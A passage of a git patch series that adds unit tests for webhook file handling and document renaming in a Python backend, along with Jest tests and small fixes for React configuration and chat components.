test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..920b1e91b6 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): From 187450b875b10c5b67ab85ee59f5629a1c1049e3 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 21:09:53 +0800 Subject: [PATCH 08/27] chore: skip upload_file_id is missing (#29666) --- api/services/dataset_service.py | 2 +- .../core/workflow/test_workflow_entry.py | 32 ++++ .../test_document_service_rename_document.py | 176 ++++++++++++++++++ 3 files changed, 209 insertions(+), 1 deletion(-) create mode 100644 api/tests/unit_tests/services/test_document_service_rename_document.py diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 0df883ea98..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") From 4bf6c4dafaf49027df113eaeba15ef1d6a0cb90c Mon Sep 17 00:00:00 2001 From: quicksand Date: Mon, 15 Dec 2025 21:13:23 +0800 Subject: [PATCH 09/27] chore: add online drive metadata source enum (#29674) --- api/core/rag/index_processor/constant/built_in_field.py | 1 + 1 file changed, 1 insertion(+) diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" From dd58d4a38de83a9543449b338fb5e5b986396589 Mon Sep 17 00:00:00 2001 From: hangboss1761 <1240123692@qq.com> Date: Mon, 15 Dec 2025 21:15:55 +0800 Subject: [PATCH 10/27] fix: update chat wrapper components to use min-h instead of h for better responsiveness (#29687) --- web/app/components/base/chat/chat-with-history/chat-wrapper.tsx | 2 +- web/app/components/base/chat/embedded-chatbot/chat-wrapper.tsx | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx index 94c80687ed..ab133d67af 100644 --- a/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx +++ b/web/app/components/base/chat/chat-with-history/chat-wrapper.tsx @@ -218,7 +218,7 @@ const ChatWrapper = () => { ) } return ( -
+
{ ) } return ( -
+
Date: Mon, 15 Dec 2025 21:17:44 +0800 Subject: [PATCH 11/27] test: enhance DebugWithMultipleModel component test coverage (#29657) --- .../debug-with-multiple-model/index.spec.tsx | 249 ++++++++++++++++++ 1 file changed, 249 insertions(+) diff --git a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx index 7607a21b07..86e756d95c 100644 --- a/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx +++ b/web/app/components/app/configuration/debug/debug-with-multiple-model/index.spec.tsx @@ -206,6 +206,218 @@ describe('DebugWithMultipleModel', () => { mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration()) }) + describe('edge cases and error handling', () => { + it('should handle empty multipleModelConfigs array', () => { + renderComponent({ multipleModelConfigs: [] }) + expect(screen.queryByTestId('debug-item')).not.toBeInTheDocument() + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + }) + + it('should handle model config with missing required fields', () => { + const incompleteConfig = { id: 'incomplete' } as ModelAndParameter + renderComponent({ multipleModelConfigs: [incompleteConfig] }) + expect(screen.getByTestId('debug-item')).toBeInTheDocument() + }) + + it('should handle more than 4 model configs', () => { + const manyConfigs = Array.from({ length: 6 }, () => createModelAndParameter()) + renderComponent({ multipleModelConfigs: manyConfigs }) + + const items = screen.getAllByTestId('debug-item') + expect(items).toHaveLength(6) + + // Items beyond 4 should not have specialized positioning + items.slice(4).forEach((item) => { + expect(item.style.transform).toBe('translateX(0) translateY(0)') + }) + }) + + it('should handle modelConfig with undefined prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = undefined as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of undefined (reading \'filter\')') + }) + + it('should handle modelConfig with null prompt_variables', () => { + // Note: The current component doesn't handle undefined/null prompt_variables gracefully + // This test documents the current behavior + const modelConfig = createModelConfig() + modelConfig.configs.prompt_variables = null as any + + mockUseDebugConfigurationContext.mockReturnValue(createDebugConfiguration({ + modelConfig, + })) + + expect(() => renderComponent()).toThrow('Cannot read properties of null (reading \'filter\')') + }) + + it('should handle prompt_variables with missing required fields', () => { + const incompleteVariables: PromptVariableWithMeta[] = [ + { key: '', name: 'Empty Key', type: 'string' }, // Empty key + { key: 'valid-key', name: undefined as any, type: 'number' }, // Undefined name + { key: 'no-type', name: 'No Type', type: undefined as any }, // Undefined type + ] + + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(incompleteVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + // Should still render but handle gracefully + expect(screen.getByTestId('chat-input-area')).toBeInTheDocument() + expect(capturedChatInputProps?.inputsForm).toHaveLength(3) + }) + }) + + describe('props and callbacks', () => { + it('should call onMultipleModelConfigsChange when provided', () => { + const onMultipleModelConfigsChange = jest.fn() + renderComponent({ onMultipleModelConfigsChange }) + + // Context provider should pass through the callback + expect(onMultipleModelConfigsChange).not.toHaveBeenCalled() + }) + + it('should call onDebugWithMultipleModelChange when provided', () => { + const onDebugWithMultipleModelChange = jest.fn() + renderComponent({ onDebugWithMultipleModelChange }) + + // Context provider should pass through the callback + expect(onDebugWithMultipleModelChange).not.toHaveBeenCalled() + }) + + it('should not memoize when props change', () => { + const props1 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-1' })] }) + const { rerender } = renderComponent(props1) + + const props2 = createProps({ multipleModelConfigs: [createModelAndParameter({ id: 'model-2' })] }) + rerender() + + const items = screen.getAllByTestId('debug-item') + expect(items[0]).toHaveAttribute('data-model-id', 'model-2') + }) + }) + + describe('accessibility', () => { + it('should have accessible chat input elements', () => { + renderComponent() + + const chatInput = screen.getByTestId('chat-input-area') + expect(chatInput).toBeInTheDocument() + + // Check for button accessibility + const sendButton = screen.getByRole('button', { name: /send/i }) + expect(sendButton).toBeInTheDocument() + + const featureButton = screen.getByRole('button', { name: /feature/i }) + expect(featureButton).toBeInTheDocument() + }) + + it('should apply ARIA attributes correctly', () => { + const multipleModelConfigs = [createModelAndParameter()] + renderComponent({ multipleModelConfigs }) + + // Debug items should be identifiable + const debugItem = screen.getByTestId('debug-item') + expect(debugItem).toBeInTheDocument() + expect(debugItem).toHaveAttribute('data-model-id') + }) + }) + + describe('prompt variables transformation', () => { + it('should filter out API type variables', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'normal', name: 'Normal', type: 'string' }, + { key: 'api-var', name: 'API Var', type: 'api' }, + { key: 'number', name: 'Number', type: 'number' }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toHaveLength(2) + expect(capturedChatInputProps?.inputsForm).toEqual( + expect.arrayContaining([ + expect.objectContaining({ label: 'Normal', variable: 'normal' }), + expect.objectContaining({ label: 'Number', variable: 'number' }), + ]), + ) + expect(capturedChatInputProps?.inputsForm).not.toEqual( + expect.arrayContaining([ + expect.objectContaining({ label: 'API Var' }), + ]), + ) + }) + + it('should handle missing hide and required properties', () => { + const promptVariables: Partial[] = [ + { key: 'no-hide', name: 'No Hide', type: 'string', required: true }, + { key: 'no-required', name: 'No Required', type: 'number', hide: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables as PromptVariableWithMeta[]), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'No Hide', + variable: 'no-hide', + hide: false, // Should default to false + required: true, + }), + expect.objectContaining({ + label: 'No Required', + variable: 'no-required', + hide: true, + required: false, // Should default to false + }), + ]) + }) + + it('should preserve original hide and required values', () => { + const promptVariables: PromptVariableWithMeta[] = [ + { key: 'hidden-optional', name: 'Hidden Optional', type: 'string', hide: true, required: false }, + { key: 'visible-required', name: 'Visible Required', type: 'number', hide: false, required: true }, + ] + const debugConfiguration = createDebugConfiguration({ + modelConfig: createModelConfig(promptVariables), + }) + mockUseDebugConfigurationContext.mockReturnValue(debugConfiguration) + + renderComponent() + + expect(capturedChatInputProps?.inputsForm).toEqual([ + expect.objectContaining({ + label: 'Hidden Optional', + variable: 'hidden-optional', + hide: true, + required: false, + }), + expect.objectContaining({ + label: 'Visible Required', + variable: 'visible-required', + hide: false, + required: true, + }), + ]) + }) + }) + describe('chat input rendering', () => { it('should render chat input in chat mode with transformed prompt variables and feature handler', () => { // Arrange @@ -326,6 +538,43 @@ describe('DebugWithMultipleModel', () => { }) }) + describe('performance optimization', () => { + it('should memoize callback functions correctly', () => { + const props = createProps({ multipleModelConfigs: [createModelAndParameter()] }) + const { rerender } = renderComponent(props) + + // First render + const firstItems = screen.getAllByTestId('debug-item') + expect(firstItems).toHaveLength(1) + + // Rerender with exactly same props - should not cause re-renders + rerender() + + const secondItems = screen.getAllByTestId('debug-item') + expect(secondItems).toHaveLength(1) + + // Check that the element still renders the same content + expect(firstItems[0]).toHaveTextContent(secondItems[0].textContent || '') + }) + + it('should recalculate size and position when number of models changes', () => { + const { rerender } = renderComponent({ multipleModelConfigs: [createModelAndParameter()] }) + + // Single model - no special sizing + const singleItem = screen.getByTestId('debug-item') + expect(singleItem.style.width).toBe('') + + // Change to 2 models + rerender() + + const twoItems = screen.getAllByTestId('debug-item') + expect(twoItems[0].style.width).toBe('calc(50% - 4px - 24px)') + expect(twoItems[1].style.width).toBe('calc(50% - 4px - 24px)') + }) + }) + describe('layout sizing and positioning', () => { const expectItemLayout = ( element: HTMLElement, From 23f75a1185b2924249d53825b59014298a870f1b Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 21:18:58 +0800 Subject: [PATCH 12/27] chore: some tests for configuration components (#29653) Co-authored-by: yyh <92089059+lyzno1@users.noreply.github.com> --- .../base/group-name/index.spec.tsx | 21 +++++ .../base/operation-btn/index.spec.tsx | 76 +++++++++++++++++++ .../base/var-highlight/index.spec.tsx | 62 +++++++++++++++ .../ctrl-btn-group/index.spec.tsx | 48 ++++++++++++ .../configuration/ctrl-btn-group/index.tsx | 4 +- 5 files changed, 209 insertions(+), 2 deletions(-) create mode 100644 web/app/components/app/configuration/base/group-name/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/operation-btn/index.spec.tsx create mode 100644 web/app/components/app/configuration/base/var-highlight/index.spec.tsx create mode 100644 web/app/components/app/configuration/ctrl-btn-group/index.spec.tsx diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..b504bdcfe7 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,76 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + 